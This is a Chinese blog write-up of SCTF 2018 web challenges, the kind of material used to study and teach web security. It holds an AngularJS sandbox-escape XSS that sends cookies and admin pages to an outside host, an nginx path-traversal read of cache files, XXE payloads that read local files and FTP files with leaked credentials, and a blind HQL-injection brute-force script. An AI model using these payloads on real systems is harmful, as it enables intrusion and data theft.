

Tianji's Blog.

sctf2018

Tianji's Blog.

sctf2018

ctf

Word count: 2,535 / Reading time: 14 min

 2018/06/21   Share

• 
• 
• 
• 
• 

新的建议板

1. 基础payload

   {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(alert(1))//');}}

2. 打cookie

   {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHBzOi8veHNzcHQuY29tL0hNVHpNUycpCg==\'))//');}}

3. 调用script

   使用

   $.getScript(‘https://xsspt.com/HMTzMS')

   base64一下: JC5nZXRTY3JpcHQoJ2h0dHBzOi8veHNzcHQuY29tL0hNVHpNUycpCg==

4. 这样就可以拿到cookie

   接收到的内容如下:

   location : http://127.0.0.1:1002/admin/suggest?suggest=%7B%7B'a'.constructor.prototype.charAt=[].join;$eval('x=1%7D%20%7D%20%7D;eval(atob(%5C'JC5nZXRTY3JpcHQoJ2h0dHBzOi8veHNzcHQuY29tL0hNVHpNUycpCg==%5C'))//');%7D%7D

5. cookie里边并没有flag，并且给的地址为本地地址，并不在公网上。

6. 获取/admin的内容

   JC5nZXRTY3JpcHQoJ2h0dHA6Ly8xMjMuMjA3LjkwLjE0My9zdS5qcycpCg==
   =>
   $.getScript('http://123.207.90.143/su.js')

   {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly8xMjMuMjA3LjkwLjE0My9zdS5qcycpCg==\'))//');}}

7. su.js内容即paylaod如下：

   $.ajax({
       url: "/admin",
       type: "GET",
       dataType: "text",
       success: function(result) {
           var code = btoa(encodeURIComponent(result));
           xssPost('http://123.207.90.143', code);
       },
       error: function(msg) {
   
       }
   })
   
   function xssPost(url, postStr) {
       var de;
       de = document.body.appendChild(document.createElement('iframe'));
       de.src = 'about:blank';
       de.height = 1;
       de.width = 1;
       de.contentDocument.write('<form method="GET" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');
       de.contentDocument.forms[0].submit();
       de.style.display = 'none';
   }

8. admin内容如下:

   JTBEJTBBJTNDIURPQ1RZUEUlMjBodG1sJTNFJTBEJTBBJTNDaHRtbCUyMGxhbmclM0QlMjJ6aC1DTiUyMiUzRSUwRCUwQSUyMCUyMCUzQ2hlYWQlM0UlMEQlMEElMjAlMjAlMjAlMjAlM0NtZXRhJTIwY2hhcnNldCUzRCUyMnV0Zi04JTIyJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTNDbWV0YSUyMGh0dHAtZXF1aXYlM0QlMjJYLVVBLUNvbXBhdGlibGUlMjIlMjBjb250ZW50JTNEJTIySUUlM0RlZGdlJTIyJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTNDbWV0YSUyMG5hbWUlM0QlMjJ2aWV3cG9ydCUyMiUyMGNvbnRlbnQlM0QlMjJ3aWR0aCUzRGRldmljZS13aWR0aCUyQyUyMGluaXRpYWwtc2NhbGUlM0QxJTIyJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTNDIS0tJTIwJUU0JUI4JThBJUU4JUJGJUIwMyVFNCVCOCVBQW1ldGElRTYlQTAlODclRTclQUQlQkUqJUU1JUJGJTg1JUU5JUExJUJCKiVFNiU5NCVCRSVFNSU5QyVBOCVFNiU5QyU4MCVFNSU4OSU4RCVFOSU5RCVBMiVFRiVCQyU4QyVFNCVCQiVCQiVFNCVCRCU5NSVFNSU4NSVCNiVFNCVCQiU5NiVFNSU4NiU4NSVFNSVBRSVCOSVFOSU4MyVCRColRTUlQkYlODUlRTklQTElQkIqJUU4JUI3JTlGJUU5JTlBJThGJUU1JTg1JUI2JUU1JTkwJThFJUVGJUJDJTgxJTIwLS0lM0UlMEQlMEElMjAlMjAlMjAlMjAlM0NtZXRhJTIwbmFtZSUzRCUyMmRlc2NyaXB0aW9uJTIyJTIwY29udGVudCUzRCUyMiUyMiUzRSUwRCUwQSUyMCUyMCUyMCUyMCUzQ21ldGElMjBuYW1lJTNEJTIyYXV0aG9yJTIyJTIwY29udGVudCUzRCUyMiUyMiUzRSUwRCUwQSUyMCUyMCUyMCUyMCUzQ2xpbmslMjByZWwlM0QlMjJpY29uJTIyJTIwaHJlZiUzRCUyMiUyMiUzRSUwRCUwQSUwRCUwQSUyMCUyMCUyMCUyMCUzQ3RpdGxlJTNFU1lDJTNDJTJGdGl0bGUlM0UlMEQlMEElMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlM0NsaW5rJTIwaHJlZiUzRCUyMmh0dHBzJTNBJTJGJTJGY2RuLmJvb3Rjc3MuY29tJTJGYm9vdHN0cmFwJTJGMy4zLjclMkZjc3MlMkZib290c3RyYXAubWluLmNzcyUyMiUyMHJlbCUzRCUyMnN0eWxlc2hlZXQlMjIlM0UlMEQlMEElMjAlMjAlMjAlMjAlM0NsaW5rJTIwaHJlZiUzRCUyMmNzcyUyRmllMTAtdmlld3BvcnQtYnVnLXdvcmthcm91bmQuY3NzJTIyJTIwcmVsJTNEJTIyc3R5bGVzaGVldCUyMiUzRSUwRCUwQSUyMCUyMCUyMCUyMCUzQ2xpbmslMjBocmVmJTNEJTIyY3NzJTJGc3RhcnRlci10ZW1wbGF0ZS5jc3MlMjIlMjByZWwlM0QlMjJzdHlsZXNoZWV0JTIyJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTNDc3R5bGUlMjB0eXBlJTNEJTIydGV4dCUyRmNzcyUyMiUzRSUwRCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGJvZHklMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBwYWRkaW5nLXRvcCUzQSUyMDYwcHglM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBwYWRkaW5nLWJvdHRvbSUzQSUyMDQwcHglM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlM0MlMkZzdHlsZSUzRSUwRCUwQSUwRCUwQSUyMCUyMCUyMCUyMCUzQ3NjcmlwdCUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGY2RuLmJvb3Rjc3MuY29tJTJGYW5ndWxhci5qcyUyRjEuNC42JTJGYW5ndWxhci5taW4uanMlMjIlM0UlM0MlMkZzY3JpcHQlM0UlMEQlMEElMjAlMjAlMjAlMjAlM0NzY3JpcHQlMjBzcmMlM0QlMjJodHRwcyUzQSUyRiUyRmFwcHMuYmRpbWcuY29tJTJGbGlicyUyRmFuZ3VsYXItcm91dGUlMkYxLjMuMTMlMkZhbmd1bGFyLXJvdXRlLmpzJTIyJTNFJTNDJTJGc2NyaXB0JTNFJTBEJTBBJTIwJTIwJTIwJTIwJTNDc2NyaXB0JTIwc3JjJTNEJTIyanMlMkZpZS1lbXVsYXRpb24tbW9kZXMtd2FybmluZy5qcyUyMiUzRSUzQyUyRnNjcmlwdCUzRSUwRCUwQSUwRCUwQSUyMCUyMCUzQyUyRmhlYWQlM0UlMEQlMEElMEQlMEElMjAlMjAlM0Nib2R5JTIwJTNFJTBEJTBBJTBEJTBBJTIwJTIwJTIwJTIwJTNDbmF2JTIwY2xhc3MlM0QlMjJuYXZiYXIlMjBuYXZiYXItaW52ZXJzZSUyMG5hdmJhci1maXhlZC10b3AlMjIlM0UlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlM0NkaXYlMjBjbGFzcyUzRCUyMmNvbnRhaW5lciUyMiUzRSUwRCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUzQ2RpdiUyMGNsYXNzJTNEJTIybmF2YmFyLWhlYWRlciUyMiUzRSUwRCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUzQ2J1dHRvbiUyMHR5cGUlM0QlMjJidXR0b24lMjIlMjBjbGFzcyUzRCUyMm5hdmJhci10b2dnbGUlMjBjb2xsYXBzZWQlMjIlMjBkYXRhLXRvZ2dsZSUzRCUyMmNvbGxhcHNlJTIyJTIwZGF0YS10YXJnZXQlM0QlMjIlMjNuYXZiYXIlMjIlMjBhcmlhLWV4cGFuZGVkJTNEJTIyZmFsc2UlMjIlMjBhcmlhLWNvbnRyb2xzJTNEJTIybmF2YmFyJTIyJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDc3BhbiUyMGNsYXNzJTNEJTIyc3Itb25seSUyMiUzRVRvZ2dsZSUyMG5hdmlnYXRpb24lM0MlMkZzcGFuJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDc3BhbiUyMGNsYXNzJTNEJTIyaWNvbi1iYXIlMjIlM0UlM0MlMkZzcGFuJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDc3BhbiUyMGNsYXNzJTNEJTIyaWNvbi1iYXIlMjIlM0UlM0MlMkZzcGFuJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDc3BhbiUyMGNsYXNzJTNEJTIyaWNvbi1iYXIlMjIlM0UlM0MlMkZzcGFuJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDJTJGYnV0dG9uJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDYSUyMGNsYXNzJTNEJTIybmF2YmFyLWJyYW5kJTIyJTIwaHJlZiUzRCUyMiUyRiUyMiUzRVNZQyUyMEFETUlOJTNDJTJGYSUzRSUwRCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUzQyUyRmRpdiUzRSUwRCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUzQ2RpdiUyMGlkJTNEJTIybmF2YmFyJTIyJTIwY2xhc3MlM0QlMjJjb2xsYXBzZSUyMG5hdmJhci1jb2xsYXBzZSUyMiUzRSUwRCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUzQ3VsJTIwY2xhc3MlM0QlMjJuYXYlMjBuYXZiYXItbmF2JTIyJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDbGklMjBjbGFzcyUzRCUyMmFjdGl2ZSUyMiUzRSUzQ2ElMjBocmVmJTNEJTIyJTIzJTIyJTNFSG9tZSUzQyUyRmElM0UlM0MlMkZsaSUzRSUwRCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUzQ2xpJTNFJTNDYSUyMGhyZWYlM0QlMjIlMjMlMjIlM0UlRTYlOTclQTUlRTUlQkYlOTclM0MlMkZhJTNFJTNDJTJGbGklM0UlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlM0NsaSUzRSUzQ2ElMjBocmVmJTNEJTIyJTIzJTIyJTNFJUU4JUI0JUE2JUU1JThEJTk1JTNDJTJGYSUzRSUzQyUyRmxpJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDbGklM0UlM0NhJTIwaHJlZiUzRCUyMmFkbWluJTJGZmlsZSUyMiUzRSVFNiU5NiU4NyVFNCVCQiVCNiUzQyUyRmElM0UlM0MlMkZsaSUzRSUwRCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUzQ2xpJTNFJTNDYSUyMGhyZWYlM0QlMjJhZG1pbiUyRnN1Z2dlc3QlMjIlM0UlRTclOTUlOTklRTglQTglODAlM0MlMkZhJTNFJTNDJTJGbGklM0UlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlM0NsaSUzRSUzQ2ElMjBocmVmJTNEJTIyJTIzJTIyJTNFJUU1JThGJTkxJUU1JUI4JTgzJTNDJTJGYSUzRSUzQyUyRmxpJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDJTJGdWwlM0UlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlM0MlMkZkaXYlM0UlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlM0MlMkZkaXYlM0UlMEQlMEElMjAlMjAlMjAlMjAlM0MlMkZuYXYlM0UlMEQlMEElMEQlMEElMEQlMEElM0NkaXYlMjBjbGFzcyUzRCUyMmNvbnRhaW5lciUyMiUzRSUwRCUwQSUyMCUyMCUzQ2RpdiUyMGNsYXNzJTNEJTIyanVtYm90cm9uJTIyJTNFJTBEJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDaDElM0VIRUxMTyUyMGFkbWluQ2xvdW5kJTNDJTJGaDElM0UlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlM0NwJTNFJUU2JTk2JUIwJUU3JTg5JTg4JUU1JTkwJThFJUU1JThGJUIwMi4wISUzQyUyRnAlM0UlMEQlMEElMjAlMjAlM0MlMkZkaXYlM0UlMEQlMEElM0MlMkZkaXYlM0UlMEQlMEElMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlM0MhLS0lMjBCb290c3RyYXAlMjBjb3JlJTIwSmF2YVNjcmlwdCUwRCUwQSUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUzRCUyMC0tJTNFJTBEJTBBJTNDIS0tJTIwUGxhY2VkJTIwYXQlMjB0aGUlMjBlbmQlMjBvZiUyMHRoZSUyMGRvY3VtZW50JTIwc28lMjB0aGUlMjBwYWdlcyUyMGxvYWQlMjBmYXN0ZXIlMjAtLSUzRSUwRCUwQSUzQ3NjcmlwdCUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGY2RuLmJvb3Rjc3MuY29tJTJGanF1ZXJ5JTJGMS4xMi40JTJGanF1ZXJ5Lm1pbi5qcyUyMiUzRSUzQyUyRnNjcmlwdCUzRSUwRCUwQSUzQ3NjcmlwdCUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGY2RuLmJvb3Rjc3MuY29tJTJGYm9vdHN0cmFwJTJGMy4zLjclMkZqcyUyRmJvb3RzdHJhcC5taW4uanMlMjIlM0UlM0MlMkZzY3JpcHQlM0UlMEQlMEElM0MhLS0lMjBJRTEwJTIwdmlld3BvcnQlMjBoYWNrJTIwZm9yJTIwU3VyZmFjZSUyRmRlc2t0b3AlMjBXaW5kb3dzJTIwOCUyMGJ1ZyUyMC0tJTNFJTBEJTBBJTNDc2NyaXB0JTIwc3JjJTNEJTIyanMlMkZpZTEwLXZpZXdwb3J0LWJ1Zy13b3JrYXJvdW5kLmpzJTIyJTNFJTNDJTJGc2NyaXB0JTNFJTBEJTBBJTBEJTBBJTNDJTJGYm9keSUzRSUwRCUwQSUzQyUyRmh0bWwlM0UlMEQlMEElMEQlMEE%3D

   解码后:

   ...
   <div class="container">
     <div class="jumbotron">
           <h1>HELLO adminClound</h1>
           <p>新版后台2.0!</p>
     </div>
   </div>
   ...

9. 获取admin/file，需要登录

   <div class="container">
     <form method="post">
       <label for="filePasswd" class="sr-only">输入文件密码</label>
       <input type="text" id="filePasswd" class="form-control" placeholder="filepasswd" required="" autofocus="" name="filepasswd">
       <button class="btn btn-lg btn-primary btn-block" type="submit">提交</button>
     </form>
   </div>

10. 我们发现新的用户

    adminClound

    结合路由:

    http://116.62.137.114:4879/api/memos/admintest2313

    访问http://116.62.137.114:4879/api/memos/adminClound

    得到adminClound的密码:HGf^&39NsslUIf^23

11. 登录admin/file

    paylaod如下：

    $.ajax({
        url: "/admin/file",
        type: "POST",
        data: "filepasswd=HGf%5E%2639NsslUIf%5E23",
        dataType: "text",
        success: function(result) {
            var code = btoa(encodeURIComponent(result));
            xssPost('http://123.207.90.143', code);
        },
        error: function(msg) {
    
        }
    })
    
    function xssPost(url, postStr) {
        var de;
        de = document.body.appendChild(document.createElement('iframe'));
        de.src = 'about:blank';
        de.height = 1;
        de.width = 1;
        de.contentDocument.write('<form method="GET" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');
        de.contentDocument.forms[0].submit();
        de.style.display = 'none';
    }

    得到flag:sctf{T4is_is_f1ag2313}。

nginx的秘密

hint4:/editxxxxx怎么也能访问?

hint3:路由嘛，扫一扫目录就知道了。views.py是读不出来的233333

hint2:这个路由好生奇怪

hint1:从nginx的典型错误配置入手吧

目录穿越漏洞

-syc-note 我已经把所有秘密写进secret plan了233333

​ 需要读取secret plain

首先可以发现nginx存在目录穿越漏洞，可以参考https://github.com/vulhub/vulhub/tree/master/nginx/insecure-configuration。

访问http://116.62.137.155:4455/static../etc/nginx/nginx.conf>，即可得到nginx.conf

理解proxy_cache_path

user www-data;
worker_processes auto;
pid /run/nginx.pid;

events {
  worker_connections 768;
  # multi_accept on;
}

http {

  ##
  # Basic Settings
  ##

  sendfile on;
  tcp_nopush on;
  tcp_nodelay on;
  keepalive_timeout 65;
  types_hash_max_size 2048;
  # server_tokens off;

  # server_names_hash_bucket_size 64;
  # server_name_in_redirect off;

  include /etc/nginx/mime.types;
  default_type application/octet-stream;

  ##
  # SSL Settings
  ##

  ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
  ssl_prefer_server_ciphers on;

  ##
  # Logging Settings
  ##

  #access_log /var/log/nginx/access.log;
  #error_log /var/log/nginx/error.log;

  ##
  # Gzip Settings
  ##

  gzip on;
  gzip_disable "msie6";

  # gzip_vary on;
  # gzip_proxied any;
  # gzip_comp_level 6;
  # gzip_buffers 16 8k;
  # gzip_http_version 1.1;
  # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

  proxy_cache_path /tmp/mycache levels=1:2 keys_zone=my_cache:10m max_size=10g inactive=30s use_temp_path=off;
  
  limit_conn_zone $binary_remote_addr zone=conn:10m;
  limit_req_zone  $binary_remote_addr zone=allips:10m rate=2r/s;

  
  server {
      listen 4455 default_server;
      server_name localhost;

      location /static {
          alias /home/;
      }

      location ~* \.(css|js|gif|png){
          proxy_cache             my_cache;
          proxy_cache_valid       200 30s;
          proxy_pass              http://bugweb.app:8000;
          proxy_set_header        Host $host:$server_port;
          proxy_ignore_headers    Expires Cache-Control Set-Cookie;
      }

      location / {
          limit_conn conn 10;
          proxy_pass       http://bugweb.app:8000;
          proxy_set_header Host $host:$server_port;
      }
  }
  ##
  # Virtual Host Configs
  ##

  include /etc/nginx/conf.d/*.conf;
  include /etc/nginx/sites-enabled/*;
}


#mail {
# # See sample authentication script at:
# # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
# 
# # auth_http localhost/auth.php;
# # pop3_capabilities "TOP" "USER";
# # imap_capabilities "IMAP4rev1" "UIDPLUS";
# 
# server {
#   listen     localhost:110;
#   protocol   pop3;
#   proxy      on;
# }
# 
# server {
#   listen     localhost:143;
#   protocol   imap;
#   proxy      on;
# }
#}

其中最重要的是这句话:

proxy_cache_path /tmp/mycache levels=1:2 keys_zone=my_cache:10m max_size=10g inactive=30s use_temp_path=off;

匹配到~* .(css|js|gif|png)就进行缓存。

查看文档http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_path 了解proxy_cache_path的值的含义，得知缓存文件保存在/tmp/mycache，用于定义缓存文件名的proxy_cache_key未设置，则使用默认值 \$scheme\$proxy_host\$request_uri，即文件名形式为MD5(\$scheme\$proxy_host\$request_uri),如果访问http://116.62.137.155:4455/write_plan/a.js/ ，则缓存文件名为MD5(http://bugweb.app:8000/write_plan/a.js/) ==6fcfa7b1e6bad837b70dc98c9b82b43b，由于proxy_cache_path设置了levels=1:2，因此缓存文件存在/tmp/mycache下的两级目录下，第一级目录名取MD5值的最后一个字符，第二级目录名取MD5值的倒数2、3个字符，例如/tmp/mycache/b/43/6fcfa7b1e6bad837b70dc98c9b82b43b，再通过任意文件读取即可读到缓存文件的内容。

读取secret_plain

由于路由很奇怪，访问/editxxxxx等同于访问/edit，同理访问/write_planxxxx等同于访问/write_planxxxx。因而构造http://116.62.137.155:4455/write_plan/a.js/ 提交给管理员访问， 管理员在查看该页面之后，也就相当于访问了管理员的http://116.62.137.155:4455/write_plan,并生成了缓存文件，这时候再读取缓存文件。

http://116.62.137.155:4455/static../tmp/mycache/b/43/6fcfa7b1e6bad837b70dc98c9b82b43b

       嬹,[    m?[    ,R泻  ? 
                                                                                                      
KEY: http://bugweb.app:8000/write_plan/a.js/
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 3555

<!DOCTYPE html>
<html>
  <head>

    <title>post bug</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Bootstrap -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
<link rel="shortcut icon" href="/static/favicon.ico" type="image/x-icon">
<link rel="icon" href="/static/favicon.ico" type="image/x-icon">

  </head>
  <body>
    
<div class="navbar navbar-inverse" role="navigation">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">Syc Work Notes</a>
        </div>
        <div class="navbar-collapse collapse">
            <ul class="nav navbar-nav">
                
          <li><a href="/user/admin">UserInfo</a></li>
          <li><a href="/edit/">EditMyinfo</a></li>
                    <li><a href="/write_plan/">Write_your_plan</a></li>
                    <li><a href="/import_and_export/">import_and_export</a></li>
          <li><a href="/post_bug/">Post Bug</a></li>
          <li><a href="/auth/logout?url=logout">Sign Out</a></li>
        
            </ul>
        </div>
    </div>
</div>

    
<div class="container">
    

    
<div class="page-header">
    <h1>Write down your secret plan. Rest assured that no one will see you.</h1>
</div>
<ul class="posts">
    
<form action="" method="post"
  class="form" role="form">
  <input id="csrf_token" name="csrf_token" type="hidden" value="Ijc3Mzk4MDMxYmI1NDUwMTA4NTZkOGEzYzhlZjAwZDMxOGZlMjNkMDQi.Dg6C7Q.1hRJWLxrI4d2tPRJMw5y3-WMtpE">
  
    




<div class="form-group "><label class="control-label" for="content">Write your plan</label>
        
          <textarea class="form-control" id="content" name="content"></textarea>
        
  </div>


    





  

  
  


    <input class="btn btn-default" id="submit" name="submit" type="submit" value="Submit">
  




    

</form>
    
      <li class="post">
         <div class="post-date">
          <span class="flask-moment" data-timestamp="2018-05-17T07:46:36Z" data-format="fromNow(0)" data-refresh="0" style="display: none">2018-05-17T07:46:36Z</span>
              鏄庢櫄缁村悓缃戞鐨刦tp鏈嶅姟鍣紝syc10ver Eec5TN9fruOOTp2G銆傚瘑鐮佽繖涔堥暱鐪熸槸闅捐锛屽娉ㄤ竴涓媬銆?        </div>
      </li>
    
</ul>

</div>


    

    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.18.1/moment-with-locales.min.js"></script>
<script>
moment.locale("en");
function flask_moment_render(elem) {
    $(elem).text(eval('moment("' + $(elem).data('timestamp') + '").' + $(elem).data('format') + ';'));
    $(elem).removeClass('flask-moment').show();
}
function flask_moment_render_all() {
    $('.flask-moment').each(function() {
        flask_moment_render(this);
        if ($(this).data('refresh')) {
            (function(elem, interval) { setInterval(function() { flask_moment_render(elem) }, interval); })(this, $(this).data('refresh'));
        }
    })
}
$(document).ready(function() {
    flask_moment_render_all();
});
</script>

  </body>
</html>

从中我们可以得到ftp的账号密码:

syc10ver Eec5TN9fruOOTp2G

xxe 读取/proc/net/arp

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/net/arp">
]>
<plans>
    <plan>
        <content>&file;</content>
    </plan>
</plans>

结果如下:

43 minutes ago 172.18.0.1 0x1 0x2 02:42:ca:cd:4e:eb * eth0
43 minutes ago
43 minutes ago 172.18.0.4 0x1 0x2 02:42:ac:12:00:04 * eth0
43 minutes ago
43 minutes ago 172.18.0.2 0x1 0x2 02:42:ac:12:00:02 * eth0

xxe读取172.18.0.4:21的目录

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "ftp://syc10ver:Eec5TN9fruOOTp2G@172.18.0.4:21/">
]>
<plans>
    <plan>
        <content>&file;</content>
    </plan>
</plans>

结果:

2 minutes ago -rw-r--r-- 1 0 0 38 Jun 17 14:04 flag327a6c4304ad5938eaf0efb6cc3e53dc

xxe读取172.18.0.4:21/flag327a6c4304ad5938eaf0efb6cc3e53dc

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "ftp://syc10ver:Eec5TN9fruOOTp2G@172.18.0.4:21/flag327a6c4304ad5938eaf0efb6cc3e53dc">
]>
<plans>
    <plan>
        <content>&file;</content>
    </plan>
</plans>

结果:

20 minutes ago sctf{Not_0n1y_xx3_but_als0_web_cache}

##Zhuanxv

主要代码片段

//UserLoginAction.class
public boolean userCheck(User user) {
    List < User > userList = this.userService.loginCheck(user.getName(), user.getPassword());
    if ((userList != null) && (userList.size() == 1)) {
        return true;
    }
    addActionError("Username or password is Wrong, please check!");
    return false;
}

//UserServiceImpl.class
public List <User> loginCheck(String name, String password) {
    name = name.replaceAll(" ", "");
    name = name.replaceAll("=", "");
    Matcher username_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(name);
    Matcher password_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(password);
    if (password_matcher.find()) {
        return this.userDao.loginCheck(name, password);
    }
    return null;
}

//UserDaoImpl.class
public List <User> loginCheck(String name, String password) {
    return getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");
}

payload

import requests
s=requests.session()

# 漏洞语句 hql
# from User where name = '" + name + "' and password = '" + password + "'"
# 
# 更简单的payload
# user.name=1'or(from%0aFlag)like'sctf{%25'or''like'&user.password=asdf
flag=''
for i in range(1,50):
    p=''
    for j in range(1,255):
        # 注意空格需要替换为换行(%0a)或者(%09)W，这是因为代码中将空格替换为""
        payload="(select%0aascii(substr(id,"+str(i)+",1))%0afrom%0aFlag%0awhere%0aid<2)<'"+str(j)+"'"
        #print payload
        url="http://121.196.195.244:9032/zhuanxvlogin?user.name=admin'or%0a"+payload+"%0aor%0aname%0alike%0a'admin&user.password=1"
        print url
        r1=s.get(url)
        #print url
        #print len(r1.text)
        if len(r1.text)>20000 and p!='':
            flag+=p
            print i,flag
            break
        p=chr(j)

# http://121.196.195.244:9032/zhuanxvlogin?user.name=admin'or%0a(select%0Aascii(substr(id,1,1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'116'%0aor%0aname%0alike%0a'admin&user.password=1
# user.name=1'or(from%0aFlag)like'sctf{%25'or''like'&user.password=aaaa

BabySyc - Simple PHP Web

原文作者: Tianji

原文链接: https://www.tiandiwuji.top/posts/32268/

发表日期: June 21st 2018, 9:59:01 am

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  linux常见文件的作用
• Previous Post
  python多线程和lock和Rlock

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 新的建议板
2. 2. nginx的秘密
   1. 2.1. 目录穿越漏洞
   2. 2.2. 理解proxy_cache_path
   3. 2.3. 读取secret_plain
   4. 2.4. xxe 读取/proc/net/arp
   5. 2.5. xxe读取172.18.0.4:21的目录
   6. 2.6. xxe读取172.18.0.4:21/flag327a6c4304ad5938eaf0efb6cc3e53dc
   7. 2.7. 主要代码片段
   8. 2.8. payload
3. 3. BabySyc - Simple PHP Web



• Archive
• Tag
• Cate

Total : 77

2099

• 01/01day-day-up

2019

• 04/18AtomicInteger代码阅读
• 03/06算法刷刷刷
• 02/24java-面试准备
• 01/15dubbo-problem
• 01/12Thinkphp5.0.*之RCE漏洞分析

2018

• 12/2835c3ctf
• 12/27java开发小记
• 12/21软件安装相关问题
• 12/16内存取证分析
• 12/15xmasctf
• 12/10hxp-ctf
• 12/05php调试分析
• 12/05php7.2内核调试环境搭建
• 12/04linux-优化实战笔记
• 12/02RealWorldFinal
• 12/01pwnable.tw练习
• 11/29bctf2018
• 11/28安全域划分的相关问题
• 11/25code-breaking
• 11/19lctf-2018
• 11/11hctf2018
• 11/04SROP-study
• 11/02tcache-study
• 10/23hitcon-复现
• 10/17hack-lu
• 10/01netty入门到精通-初识NIO
• 09/26php-项目结构
• 09/26jvm-深入拆解java虚拟机
• 09/22anheng
• 09/21pwnable.kr_刷刷刷
• 09/20dubbo项目结构
• 09/20zookeeper安装-启动
• 09/20dubbo-启动
• 09/18casw-2018
• 09/18渗透测试-vulnhub-acid
• 09/08noxctf-writeup
• 09/05lamp && lnmp以apt-get的方式安装
• 09/04websec.fr-writeup
• 09/02TokyoWesterns CTF
• 08/06how2heap-分析总结
• 08/060ctf2018-babyheap
